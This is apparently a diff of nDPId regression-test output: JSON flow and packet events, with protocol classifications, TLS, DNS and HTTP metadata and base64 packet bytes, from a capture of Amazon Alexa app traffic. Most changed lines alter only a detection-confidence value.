-01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1490976031581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976031581,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WlFAAEARM2SsECrYrBAqAaBGADUAKk94StwBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1490976031687,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976031687,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0Y5AAEARu\/+sECoBrBAq2AA1oEYAUS8VStyBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAA8ACwhwaXRhbmd1acASwC4AAQABAAAADwAENF7ohg=="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1490976032763,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1490976032763,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1490976035502,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1490976035502,"pkt":"AMDKkaPvePiC0\/vCCABFAABWWlJAAEARM0usECrYrBAqAVwHADUAQq4NgPsBAAABAAAAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAQ=="} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1490976035549,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1490976035549,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC20jNAAEARuwmsECoBrBAq2AA1XAcAoid0gPuBgAABAAYAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAcAMAAEAAQAAAAIABCLHNPDADAABAAEAAAACAAQ0AM87wAwAAQABAAAAAgAENBT4ysAMAAEAAQAAAAIABCLAPyvADAABAAEAAAACAAQ0ynf3wAwAAQABAAAAAgAENq23qQ=="} -00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} +00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, 